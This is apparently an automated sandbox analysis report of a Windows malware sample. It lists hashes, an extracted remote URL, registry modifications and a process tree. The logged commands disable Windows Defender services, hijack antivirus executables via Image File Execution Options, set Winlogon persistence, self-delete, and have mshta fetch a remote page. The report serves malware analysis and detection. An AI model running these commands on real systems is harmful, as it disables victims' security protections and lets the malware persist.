Analysis
-
max time kernel
151s -
max time network
50s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
01/12/2022, 19:07
Static task
static1
Behavioral task
behavioral1
Sample
b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe
Resource
win10v2004-20220901-en
General
-
Target
b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe
-
Size
2.2MB
-
MD5
7e9163186764adcc6ca4266245338469
-
SHA1
d81c8dbc93a2c231bde95790e95ab41fd61a69e5
-
SHA256
b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7
-
SHA512
b6868287bcfea581c411f30e74b9aa508a51ea323176d41fcb7a736a939f55adecc2f438ce9593fcadc97b95e9f68e4c718c0d7f77c6fc3b248c3b45ac8a8be1
-
SSDEEP
49152:iCqfgdwTM34pnNSzsIjxQCqsMbvVNMbue/nMzA4pW2xWeZ0Rm2op7hTzxC:JQDHShtBqsMbvFeaxXMIp79zxC
Malware Config
Extracted
http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=ORXGKKZC&2=i-s&3=59&4=7601&5=6&6=1&7=99600&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\noyixl.exe" noyixl.exe -
Executes dropped EXE 1 IoCs
pid Process 1240 noyixl.exe -
Sets file execution options in registry 2 TTPs 16 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" noyixl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe noyixl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" noyixl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe noyixl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" noyixl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe noyixl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe noyixl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe noyixl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" noyixl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe noyixl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" noyixl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe \Debugger = "svchost.exe" noyixl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe noyixl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" noyixl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe noyixl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" noyixl.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
pid Process 1776 cmd.exe -
Loads dropped DLL 2 IoCs
pid Process 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 892 sc.exe 1232 sc.exe 1864 sc.exe 336 sc.exe 812 sc.exe 1976 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1240 noyixl.exe Token: SeShutdownPrivilege 1240 noyixl.exe Token: SeDebugPrivilege 1240 noyixl.exe Token: SeShutdownPrivilege 1240 noyixl.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe 1240 noyixl.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1240 noyixl.exe 1240 noyixl.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 1992 wrote to memory of 1976 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 26 PID 1992 wrote to memory of 1976 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 26 PID 1992 wrote to memory of 1976 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 26 PID 1992 wrote to memory of 1976 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 26 PID 1992 wrote to memory of 892 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 27 PID 1992 wrote to memory of 892 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 27 PID 1992 wrote to memory of 892 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 27 PID 1992 wrote to memory of 892 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 27 PID 1992 wrote to memory of 1528 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 30 PID 1992 wrote to memory of 1528 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 30 PID 1992 wrote to memory of 1528 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 30 PID 1992 wrote to memory of 1528 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 30 PID 1992 wrote to memory of 1232 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 31 PID 1992 wrote to memory of 1232 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 31 PID 1992 wrote to memory of 1232 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 31 PID 1992 wrote to memory of 1232 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 31 PID 1992 wrote to memory of 1240 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 34 PID 1992 wrote to memory of 1240 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 34 PID 1992 wrote to memory of 1240 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 34 PID 1992 wrote to memory of 1240 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 34 PID 1992 wrote to memory of 1776 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 35 PID 1992 wrote to memory of 1776 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 35 PID 1992 wrote to memory of 1776 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 35 PID 1992 wrote to memory of 1776 1992 b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe 35 PID 1528 wrote to memory of 1360 1528 net.exe 37 PID 1528 wrote to memory of 1360 1528 net.exe 37 PID 1528 wrote to memory of 1360 1528 net.exe 37 PID 1528 wrote to memory of 1360 1528 net.exe 37 PID 1240 wrote to memory of 1864 1240 noyixl.exe 38 PID 1240 wrote to memory of 1864 1240 noyixl.exe 38 PID 1240 wrote to memory of 1864 1240 noyixl.exe 38 PID 1240 wrote to memory of 1864 1240 noyixl.exe 38 PID 1240 wrote to memory of 336 1240 noyixl.exe 40 PID 1240 wrote to memory of 336 1240 noyixl.exe 40 PID 1240 wrote to memory of 336 1240 noyixl.exe 40 PID 1240 wrote to memory of 336 1240 noyixl.exe 40 PID 1240 wrote to memory of 1132 1240 noyixl.exe 41 PID 1240 wrote to memory of 1132 1240 noyixl.exe 41 PID 1240 wrote to memory of 1132 1240 noyixl.exe 41 PID 1240 wrote to memory of 1132 1240 noyixl.exe 41 PID 1240 wrote to memory of 812 1240 noyixl.exe 43 PID 1240 wrote to memory of 812 1240 noyixl.exe 43 PID 1240 wrote to memory of 812 1240 noyixl.exe 43 PID 1240 wrote to memory of 812 1240 noyixl.exe 43 PID 1132 wrote to memory of 2044 1132 net.exe 46 PID 1132 wrote to memory of 2044 1132 net.exe 46 PID 1132 wrote to memory of 2044 1132 net.exe 46 PID 1132 wrote to memory of 2044 1132 net.exe 46 PID 1240 wrote to memory of 984 1240 noyixl.exe 47 PID 1240 wrote to memory of 984 1240 noyixl.exe 47 PID 1240 wrote to memory of 984 1240 noyixl.exe 47 PID 1240 wrote to memory of 984 1240 noyixl.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe"C:\Users\Admin\AppData\Local\Temp\b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:1976
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:892
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵PID:1360
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
PID:1232
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\noyixl.exeC:\Users\Admin\AppData\Roaming\Microsoft\noyixl.exe2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Sets file execution options in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:1864
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:336
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵PID:2044
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
PID:812
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=ORXGKKZC&2=i-s&3=59&4=7601&5=6&6=1&7=99600&8=1033"3⤵
- Modifies Internet Explorer settings
PID:984
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\B4A99F~1.EXE" >> NUL2⤵
- Deletes itself
PID:1776
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD57e9163186764adcc6ca4266245338469
SHA1d81c8dbc93a2c231bde95790e95ab41fd61a69e5
SHA256b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7
SHA512b6868287bcfea581c411f30e74b9aa508a51ea323176d41fcb7a736a939f55adecc2f438ce9593fcadc97b95e9f68e4c718c0d7f77c6fc3b248c3b45ac8a8be1
-
Filesize
2.2MB
MD57e9163186764adcc6ca4266245338469
SHA1d81c8dbc93a2c231bde95790e95ab41fd61a69e5
SHA256b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7
SHA512b6868287bcfea581c411f30e74b9aa508a51ea323176d41fcb7a736a939f55adecc2f438ce9593fcadc97b95e9f68e4c718c0d7f77c6fc3b248c3b45ac8a8be1
-
Filesize
2.2MB
MD57e9163186764adcc6ca4266245338469
SHA1d81c8dbc93a2c231bde95790e95ab41fd61a69e5
SHA256b4a99fc882f9cf188302515bcd8f1fd103cdc39c4ea7524a5397504226b34bc7
SHA512b6868287bcfea581c411f30e74b9aa508a51ea323176d41fcb7a736a939f55adecc2f438ce9593fcadc97b95e9f68e4c718c0d7f77c6fc3b248c3b45ac8a8be1